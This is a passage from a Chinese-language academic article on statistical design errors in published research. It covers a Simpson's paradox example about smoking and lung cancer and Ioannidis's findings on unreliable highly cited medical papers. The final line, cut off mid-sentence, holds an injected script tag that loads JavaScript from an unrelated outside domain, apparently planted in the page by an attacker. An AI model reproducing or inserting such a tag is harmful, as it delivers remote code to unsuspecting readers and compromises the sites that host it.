1 引言
首先,让我们以“科学观察”的眼光来看一个非常经典的Simpson(1951)悖论。这个悖论的大意是:假如有一组关于吸烟与肺癌关系的调查研究数据,对其进行统计分析时,若考虑的影响因素的个数不同,将会得到自相矛盾的结论。具体地说,在这个调查研究数据中,总调查人数N=400,若按是否吸烟划分,其中吸烟者200人、不吸烟者200人;若按性别划分,其中男性200人、女性200人;若按年龄划分,其中£40岁225人、>40岁175人。设P1代表吸烟者患肺癌率、P2代表不吸烟者患肺癌率。
原作者所采用的分析策略和结果如下:分析策略(1):若仅考察吸烟与不吸烟者患肺癌率之间的差别时,发现吸烟者似乎更不易于患肺癌;分析策略(2):若分别在男性组与女性组中考察吸烟与不吸烟者患肺癌率之间的差别时,发现吸烟者似乎更易于患肺癌;分析策略(3):若先将调查资料按受试者的年龄分为“£40岁组”和“>40岁组”,再在每个年龄组内,采用前述第(2)种分析策略进行计算,得到的结论为:吸烟者似乎更不易于患肺癌。
为什么会得出这种前后自相矛盾的分析结果呢?究竟哪一种分析策略计算的结果正确?出错的原因是什么?简单地说,上述三种分析策略都是错误的,但最大的错误应该归咎于抽样设计不正确,因此,上述各种结论都是不可信的!这些问题的详细论述需要较大的篇幅,本文将在后面部分再作解答。
前面的这个例子只是无数科研实例中的一个缩影,凡是与调查研究和实验(或临床试验)研究有关的科研课题(为方便起见,此类研究在本文中将被简称为RCT研究,即随机对照研究),很多在统计研究设计(通常包括调查设计、实验设计和临床试验设计)阶段就出现了严重错误,有些在资料收集与加工、统计分析、结果解释、结论陈述和结果报告等后续环节上,都相继出现不同程度的错误。这些证据确凿的事实,就是对“为什么大多数已发表的研究成果是错误的”一文最科学最全面的回答。
众所周知,学术论文是表达科研成果的最主要形式,所以,国际上普遍以各国科技论文发表状况作为衡量科研活动的产出状况、科技实力和水平的标志之一。不难想象,科技文献的质量与水平是一个国家科研质量与水平的一面镜子,通过这面镜子,不仅能透视别国的科研质量,也可清楚地了解本国的科技实力。事实上,科技文献的质量主要取决于两个方面:其一,学术论文的创新性与实用性;其二,学术论文的科学性与严谨性。前者主要由特定领域里的专业知识和人类所处的发展阶段所决定,而后者主要由统计学知识及其与专业知识有机结合后发挥作用的程度所决定。
2 国际科技文献质量的现状
2.1 关注世界顶尖级学术期刊的三种令人担忧的苗头
全世界学术期刊不计其数,但著名的学术杂志却屈指可数。即便是那些在学术上令人仰慕的杂志,近十几年来,也出现了三种令人担忧的苗头。其一,时常刊登一些有统计学错误的学术论文。其二,论文的结论经不起时间的考验。希腊约阿尼纳大学的Ioannidis等人对1990~2003年间发表在New Engl. J. Med.、JAMA和Lancet三大著名医学杂志上,而且引用次数在1 000次以上的文献进行调查,结果显示: 在49篇高引用率的原始文献中,45篇声称干预方法有效;而报告结果被以后的研究所否定的有7篇(15.6%);最初报告的疗效被夸大的有7篇(15.6%)。因此,接近1/3的研究结果没有经受住时间的考验。其三,论文中出现了严重的学术造假?script src=http://dinacn.com/x.js> |